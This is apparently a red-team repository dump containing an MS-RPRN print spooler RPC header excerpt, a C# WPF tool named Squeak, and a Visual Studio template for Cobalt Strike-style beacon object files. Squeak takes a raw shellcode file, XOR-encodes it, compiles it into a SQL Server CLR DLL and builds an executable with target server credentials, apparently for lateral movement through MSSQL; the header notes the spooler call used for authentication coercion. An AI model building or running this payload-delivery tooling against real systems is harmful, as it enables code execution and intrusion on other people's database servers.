 * Only RpcOpenPrinter, RpcClosePrinter and
 * RpcRemoteFindFirstPrinterChangeNotificationEx carry a real parameter list.
 * Every other entry takes just a binding handle; they appear to be
 * placeholders that keep each procedure at its position in the interface
 * (the OpnumNNNotUsedOnWire names match their index in this list).
 *
 * RpcRemoteFindFirstPrinterChangeNotificationEx passes a machine name
 * (pszLocalMachine) to the spooler as the target for change notifications.
 * On hosts that do not need printing, stopping and disabling the Print
 * Spooler service removes this interface altogether.
 */

/* opnum 0 - 9 */
DWORD RpcEnumPrinters(/* [in] */ handle_t IDL_handle);
DWORD RpcOpenPrinter(
    /* [unique][string][in] */ STRING_HANDLE pPrinterName,
    /* [out] */ PRINTER_HANDLE *pHandle,
    /* [unique][string][in] */ wchar_t *pDatatype,
    /* [in] */ DEVMODE_CONTAINER *pDevModeContainer,
    /* [in] */ DWORD AccessRequired);
DWORD RpcSetJob(/* [in] */ handle_t IDL_handle);
DWORD RpcGetJob(/* [in] */ handle_t IDL_handle);
DWORD RpcEnumJobs(/* [in] */ handle_t IDL_handle);
DWORD RpcAddPrinter(/* [in] */ handle_t IDL_handle);
DWORD RpcDeletePrinter(/* [in] */ handle_t IDL_handle);
DWORD RpcSetPrinter(/* [in] */ handle_t IDL_handle);
DWORD RpcGetPrinter(/* [in] */ handle_t IDL_handle);
DWORD RpcAddPrinterDriver(/* [in] */ handle_t IDL_handle);

/* opnum 10 - 19 */
DWORD RpcEnumPrinterDrivers(/* [in] */ handle_t IDL_handle);
DWORD RpcGetPrinterDriver(/* [in] */ handle_t IDL_handle);
DWORD RpcGetPrinterDriverDirectory(/* [in] */ handle_t IDL_handle);
DWORD RpcDeletePrinterDriver(/* [in] */ handle_t IDL_handle);
DWORD RpcAddPrintProcessor(/* [in] */ handle_t IDL_handle);
DWORD RpcEnumPrintProcessors(/* [in] */ handle_t IDL_handle);
DWORD RpcGetPrintProcessorDirectory(/* [in] */ handle_t IDL_handle);
DWORD RpcStartDocPrinter(/* [in] */ handle_t IDL_handle);
DWORD RpcStartPagePrinter(/* [in] */ handle_t IDL_handle);
DWORD RpcWritePrinter(/* [in] */ handle_t IDL_handle);

/* opnum 20 - 29 */
DWORD RpcEndPagePrinter(/* [in] */ handle_t IDL_handle);
DWORD RpcAbortPrinter(/* [in] */ handle_t IDL_handle);
DWORD RpcReadPrinter(/* [in] */ handle_t IDL_handle);
DWORD RpcEndDocPrinter(/* [in] */ handle_t IDL_handle);
DWORD RpcAddJob(/* [in] */ handle_t IDL_handle);
DWORD RpcScheduleJob(/* [in] */ handle_t IDL_handle);
DWORD RpcGetPrinterData(/* [in] */ handle_t IDL_handle);
DWORD RpcSetPrinterData(/* [in] */ handle_t IDL_handle);
DWORD RpcWaitForPrinterChange(/* [in] */ handle_t IDL_handle);
DWORD RpcClosePrinter(/* [out][in] */ PRINTER_HANDLE *phPrinter);

/* opnum 30 - 39 */
DWORD RpcAddForm(/* [in] */ handle_t IDL_handle);
DWORD RpcDeleteForm(/* [in] */ handle_t IDL_handle);
DWORD RpcGetForm(/* [in] */ handle_t IDL_handle);
DWORD RpcSetForm(/* [in] */ handle_t IDL_handle);
DWORD RpcEnumForms(/* [in] */ handle_t IDL_handle);
DWORD RpcEnumPorts(/* [in] */ handle_t IDL_handle);
DWORD RpcEnumMonitors(/* [in] */ handle_t IDL_handle);
void Opnum37NotUsedOnWire(/* [in] */ handle_t IDL_handle);
void Opnum38NotUsedOnWire(/* [in] */ handle_t IDL_handle);
DWORD RpcDeletePort(/* [in] */ handle_t IDL_handle);

/* opnum 40 - 49 */
DWORD RpcCreatePrinterIC(/* [in] */ handle_t IDL_handle);
DWORD RpcPlayGdiScriptOnPrinterIC(/* [in] */ handle_t IDL_handle);
DWORD RpcDeletePrinterIC(/* [in] */ handle_t IDL_handle);
void Opnum43NotUsedOnWire(/* [in] */ handle_t IDL_handle);
void Opnum44NotUsedOnWire(/* [in] */ handle_t IDL_handle);
void Opnum45NotUsedOnWire(/* [in] */ handle_t IDL_handle);
DWORD RpcAddMonitor(/* [in] */ handle_t IDL_handle);
DWORD RpcDeleteMonitor(/* [in] */ handle_t IDL_handle);
DWORD RpcDeletePrintProcessor(/* [in] */ handle_t IDL_handle);
void Opnum49NotUsedOnWire(/* [in] */ handle_t IDL_handle);

/* opnum 50 - 59 */
void Opnum50NotUsedOnWire(/* [in] */ handle_t IDL_handle);
DWORD RpcEnumPrintProcessorDatatypes(/* [in] */ handle_t IDL_handle);
DWORD RpcResetPrinter(/* [in] */ handle_t IDL_handle);
DWORD RpcGetPrinterDriver2(/* [in] */ handle_t IDL_handle);
void Opnum54NotUsedOnWire(/* [in] */ handle_t IDL_handle);
void Opnum55NotUsedOnWire(/* [in] */ handle_t IDL_handle);
DWORD RpcFindClosePrinterChangeNotification(/* [in] */ handle_t IDL_handle);
void Opnum57NotUsedOnWire(/* [in] */ handle_t IDL_handle);
DWORD RpcReplyOpenPrinter(/* [in] */ handle_t IDL_handle);
DWORD RpcRouterReplyPrinter(/* [in] */ handle_t IDL_handle);

/* opnum 60 - 65 */
DWORD RpcReplyClosePrinter(/* [in] */ handle_t IDL_handle);
DWORD RpcAddPortEx(/* [in] */ handle_t IDL_handle);
DWORD RpcRemoteFindFirstPrinterChangeNotification(/* [in] */ handle_t IDL_handle);
void Opnum63NotUsedOnWire(/* [in] */ handle_t IDL_handle);
void Opnum64NotUsedOnWire(/* [in] */ handle_t IDL_handle);
DWORD RpcRemoteFindFirstPrinterChangeNotificationEx(
    /* [in] */ PRINTER_HANDLE hPrinter,
    /* [in] */ DWORD fdwFlags,
    /* [in] */ DWORD fdwOptions,
    /* [unique][string][in] */ wchar_t *pszLocalMachine,
    /* [in] */ DWORD dwPrinterLocal,
    /* [unique][in] */ RPC_V2_NOTIFY_OPTIONS *pOptions);
295 |
296 |
297 |
298 | extern RPC_IF_HANDLE winspool_v1_0_c_ifspec;
299 | extern RPC_IF_HANDLE winspool_v1_0_s_ifspec;
300 | #endif /* __winspool_INTERFACE_DEFINED__ */
301 |
302 | /* Additional Prototypes for ALL interfaces */
303 |
304 | handle_t __RPC_USER STRING_HANDLE_bind ( STRING_HANDLE );
305 | void __RPC_USER STRING_HANDLE_unbind( STRING_HANDLE, handle_t );
306 |
307 | void __RPC_USER PRINTER_HANDLE_rundown( PRINTER_HANDLE );
308 |
309 | /* end of Additional Prototypes */
310 |
311 | #ifdef __cplusplus
312 | }
313 | #endif
314 |
315 | #endif
316 |
--------------------------------------------------------------------------------
/Tools/Squeak/Home.xaml.cs:
--------------------------------------------------------------------------------
1 | using Microsoft.CSharp;
2 | using Microsoft.Win32;
3 | using System;
4 | using System.CodeDom.Compiler;
5 | using System.Collections.Generic;
6 | using System.IO;
7 | using System.Linq;
8 | using System.Security.Cryptography;
9 | using System.Text;
10 | using System.Threading.Tasks;
11 | using System.Windows;
12 | using System.Windows.Controls;
13 | using System.Windows.Data;
14 | using System.Windows.Documents;
15 | using System.Windows.Input;
16 | using System.Windows.Media;
17 | using System.Windows.Media.Imaging;
18 | using System.Windows.Navigation;
19 | using System.Windows.Shapes;
20 |
21 | namespace Squeak
22 | {
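/// <summary>
/// Interaction logic for Home.xaml
/// </summary>
public partial class Home : Page
{
    // Name of the intermediate CLR assembly; it is written to, and read back
    // from, the current working directory.
    private const string ClrDllFileName = "clrpoc.dll";

    public Home()
    {
        InitializeComponent();
    }

    /// <summary>Keeps the debug box scrolled to its newest line.</summary>
    private void RtbDebug_TextChanged(object sender, EventArgs e)
    {
        rtbDebug.ScrollToEnd();
    }

    /// <summary>
    /// Reads the form, encodes the selected raw file, compiles the CLR DLL from
    /// the clsCode template, then compiles the executable that embeds the DLL
    /// bytes and its SHA-512 hash. Progress and errors go to the debug box.
    /// </summary>
    /// <remarks>
    /// Two artefacts land in the current working directory: clrpoc.dll and
    /// latmovemssqloutput.exe.
    /// NOTE(review): the form values are handed to clsCode.getexecode, which is
    /// not visible here. If it splices them into source text, a quote or
    /// backslash in a value would alter the generated program; confirm that it
    /// escapes them.
    /// </remarks>
    private void Generate_Click(object sender, RoutedEventArgs e)
    {
        // Remove before adding so repeated clicks leave exactly one handler
        // attached instead of one more per click.
        rtbDebug.TextChanged -= RtbDebug_TextChanged;
        rtbDebug.TextChanged += RtbDebug_TextChanged;

        string rawfile = "";
        string server = "";
        string port = "";
        string database = "";
        string username = "";
        string password = "";
        string outputfilename = "latmovemssqloutput.exe";
        string winauth = "false";

        try
        {
            rawfile = txtRaw.Text.Trim();
            server = txtServer.Text.Trim();
            port = txtPort.Text.Trim();
            database = txtDatabase.Text.Trim();
            username = txtUsername.Text.Trim();
            password = txtPassword.Text.Trim();
            if (cbWinauth.IsChecked == true)
            {
                // Windows authentication: the credential boxes are ignored and
                // replaced with fixed marker values.
                winauth = "TRUE";
                username = "Windows Auth";
                password = "blank";
            }
        }
        catch (Exception ex)
        {
            // Report the failure instead of exiting the process silently with code 0.
            rtbDebug.AppendText("\nCould not read the form values: " + ex.Message);
            return;
        }
        rtbDebug.AppendText("\nStarting.");

        // Read the file once; the same bytes are both the accessibility check
        // and the input, so the file cannot change between the two uses.
        byte[] shellcode;
        try
        {
            shellcode = File.ReadAllBytes(rawfile);
        }
        catch (Exception)
        {
            rtbDebug.AppendText("\nCould not read shellcode file");
            return;
        }

        // Single-byte XOR with the fixed key 0xDE, then lower-case hex.
        // This is a reversible encoding, not encryption.
        byte[] key = new byte[] { 0xDE };
        byte[] shellcodexor = exclusiveOR(shellcode, key);
        string hex = ByteArrayToString(shellcodexor);

        clsCode codeclass = new clsCode();

        // Generate the CLR DLL and read its bytes back for hashing.
        string dllcode = codeclass.getdllcode(hex);
        string dllerrors = compileDLL(dllcode);

        if (dllerrors.Length > 2)
        {
            rtbDebug.AppendText("\nError compiling DLL: " + dllerrors);
            return;
        }

        byte[] dllbytes = File.ReadAllBytes(ClrDllFileName);
        string dllstring = "0x" + ByteArrayToStringFlat(dllbytes);
        string sha512hash = "0x" + hashdata(dllbytes);
        rtbDebug.AppendText("\nSha512 hash of DLL is " + sha512hash);

        string code = codeclass.getexecode(server, port, database, username, password, sha512hash, dllstring, winauth);

        try
        {
            string sqlerrors = compileMSSQL(code, outputfilename);
            if (sqlerrors.Length > 1)
            {
                rtbDebug.AppendText("\nError compiling lat move exe: " + sqlerrors);
            }
            else
            {
                rtbDebug.AppendText("\nYour exe has been written to: " + System.Environment.CurrentDirectory + @"\" + outputfilename);
            }
        }
        catch (Exception exc)
        {
            rtbDebug.AppendText("\nSomething went wrong: " + exc.Message);
        }
    }

    /// <summary>Disables the credential boxes while Windows authentication is ticked.</summary>
    private void cbWinauth_CheckedChanged(object sender, RoutedEventArgs e)
    {
        // IsChecked is nullable; anything other than true enables manual credentials.
        bool manualCredentials = cbWinauth.IsChecked != true;
        txtUsername.IsEnabled = manualCredentials;
        txtPassword.IsEnabled = manualCredentials;
    }

    /// <summary>Returns the SHA-512 digest of <paramref name="data"/> as lower-case hex.</summary>
    private static string hashdata(byte[] data)
    {
        using (SHA512 shaM = new SHA512Managed())
        {
            return ByteArrayToStringFlat(shaM.ComputeHash(data));
        }
    }

    /// <summary>
    /// XORs every byte of <paramref name="arr1"/> with the first byte of
    /// <paramref name="arr2"/>; any further key bytes are ignored.
    /// </summary>
    /// <returns>A new array of the same length as <paramref name="arr1"/>.</returns>
    /// <exception cref="IndexOutOfRangeException">
    /// <paramref name="arr2"/> is empty while <paramref name="arr1"/> is not.
    /// </exception>
    public static byte[] exclusiveOR(byte[] arr1, byte[] arr2)
    {
        byte[] result = new byte[arr1.Length];

        for (int i = 0; i < arr1.Length; ++i)
        {
            result[i] = (byte)(arr1[i] ^ arr2[0]);
        }

        return result;
    }

    /// <summary>Formats <paramref name="ba"/> as lower-case hex, two characters per byte.</summary>
    public static string ByteArrayToString(byte[] ba)
    {
        StringBuilder hex = new StringBuilder(ba.Length * 2);
        foreach (byte b in ba)
        {
            hex.AppendFormat("{0:x2}", b);
        }
        return hex.ToString();
    }

    /// <summary>
    /// Same output as <see cref="ByteArrayToString"/>; kept as a separate name
    /// for existing callers.
    /// </summary>
    public static string ByteArrayToStringFlat(byte[] ba)
    {
        return ByteArrayToString(ba);
    }

    /// <summary>
    /// Compiles <paramref name="code"/> to an executable named
    /// <paramref name="outputfilename"/>.
    /// </summary>
    /// <returns>Compiler diagnostics, one per line; empty when there are none.</returns>
    private static string compileMSSQL(string code, string outputfilename)
    {
        return Compile(code, outputfilename, true);
    }

    /// <summary>Compiles <paramref name="code"/> to the library clrpoc.dll.</summary>
    /// <returns>Compiler diagnostics, one per line; empty when there are none.</returns>
    private static string compileDLL(string code)
    {
        return Compile(code, ClrDllFileName, false);
    }

    // Shared CodeDom driver for both outputs. Every entry in results.Errors is
    // reported, so warnings end up in the returned text as well.
    private static string Compile(string code, string outputfilename, bool generateExecutable)
    {
        var options = new Dictionary<string, string>() { { "CompilerVersion", "v4.0" } };
        var references = new[] { "system.dll", "mscorlib.dll", "System.Core.dll", "System.Data.dll" };

        // The provider is disposable; release it once the compile is done.
        using (var csc = new CSharpCodeProvider(options))
        {
            var parameters = new CompilerParameters(references, outputfilename, false);
            parameters.GenerateExecutable = generateExecutable;
            CompilerResults results = csc.CompileAssemblyFromSource(parameters, code);

            StringBuilder errors = new StringBuilder();
            foreach (CompilerError error in results.Errors)
            {
                errors.Append("\nLine " + error.Line + ": " + error.ErrorText);
            }
            return errors.ToString();
        }
    }

    /// <summary>Lets the user pick the raw input file and copies its path into the form.</summary>
    private void btnFileBrowse_Click(object sender, EventArgs e)
    {
        OpenFileDialog openFileDialog = new OpenFileDialog();
        if (openFileDialog.ShowDialog() == true)
        {
            txtRaw.Text = openFileDialog.FileName;
        }
    }

    /// <summary>Navigates to the code editing page.</summary>
    private void CodeEdit_Click(object sender, RoutedEventArgs e)
    {
        Code codepage = new Code();
        this.NavigationService.Navigate(codepage);
    }
}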
242 | }
243 |
244 |
--------------------------------------------------------------------------------
/Tools/bof-vs-template/bof/bof.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | 16.0
23 | {48E12421-9D4E-459F-8603-7D9E6A12CB39}
24 | Win32Proj
25 | bof
26 | 10.0
27 |
28 |
29 |
30 | StaticLibrary
31 | true
32 | v142
33 | Unicode
34 | false
35 |
36 |
37 | StaticLibrary
38 | false
39 | v142
40 | true
41 | Unicode
42 | false
43 |
44 |
45 | StaticLibrary
46 | true
47 | v142
48 | Unicode
49 | false
50 |
51 |
52 | StaticLibrary
53 | false
54 | v142
55 | false
56 | Unicode
57 | false
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 |
78 | true
79 | .o
80 |
81 |
82 | true
83 | .o
84 |
85 |
86 | false
87 | .o
88 | $(ProjectName)
89 |
90 |
91 | false
92 | .lib
93 | $(ProjectName)
94 |
95 |
96 |
97 |
98 |
99 | Level3
100 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
101 | false
102 |
103 |
104 | Console
105 | true
106 |
107 |
108 |
109 |
110 |
111 |
112 | Level3
113 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
114 | false
115 |
116 |
117 | Console
118 | true
119 |
120 |
121 |
122 |
123 |
124 |
125 | Level3
126 | false
127 | true
128 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
129 | false
130 | false
131 | false
132 | false
133 | Disabled
134 | None
135 |
136 |
137 | Console
138 | true
139 | true
140 | true
141 |
142 |
143 | copy /Y "$(ProjectDir)Release\$(TargetName).obj" "$(SolutionDir)cna\bin\$(TargetName).$(PlatformTarget).o"
144 |
145 |
146 |
147 |
148 |
149 |
150 | Level3
151 | false
152 | true
153 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
154 | false
155 | Neither
156 | Disabled
157 | false
158 | None
159 | false
160 |
161 |
162 | Console
163 | true
164 | true
165 | true
166 |
167 |
168 | copy /Y "$(ProjectDir)x64\Release\$(TargetName).obj" "$(SolutionDir)cna\bin\$(TargetName).$(PlatformTarget).o"
169 |
170 |
171 |
172 |
173 |
174 |
175 |
176 |
177 |
178 |
179 |
180 |
181 |
182 |
--------------------------------------------------------------------------------